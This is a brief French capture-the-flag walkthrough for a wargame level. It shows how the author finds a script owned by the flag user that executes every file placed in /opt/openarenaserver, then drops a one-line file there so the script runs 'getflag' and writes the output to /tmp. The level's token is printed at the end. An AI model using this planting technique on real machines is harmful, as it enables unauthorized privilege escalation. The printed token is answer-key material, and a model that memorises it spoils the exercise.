29 lines
676 B
Markdown
29 lines
676 B
Markdown
Lors de l'arriver sur le level05 je remarque que le dossier home et vide je decide donc faire une petite recherche de quel fichier appartient au flag05
|
|
```bash
|
|
find / -user flag05 2> /dev/null
|
|
/usr/sbin/openarenaserver
|
|
/rofs/usr/sbin/openarenaserver
|
|
```
|
|
|
|
Nous n'avons pas les permissions d'executer ce fichier mais nous pouvons le lire:
|
|
|
|
```bash
|
|
cat /usr/sbin/openarenaserver
|
|
#!/bin/sh
|
|
|
|
for i in /opt/openarenaserver/* ; do
|
|
(ulimit -t 5; bash -x "$i")
|
|
rm -f "$i"
|
|
done
|
|
```
|
|
|
|
et je vais faire un petit fichier
|
|
|
|
```bash
|
|
echo 'getflag > /tmp/flag' > /opt/openarenaserver/notanexploit
|
|
```
|
|
|
|
```bash
|
|
cat /tmp/flag
|
|
Check flag.Here is your token : viuaaale9huek52boumoomioc
|
|
```
|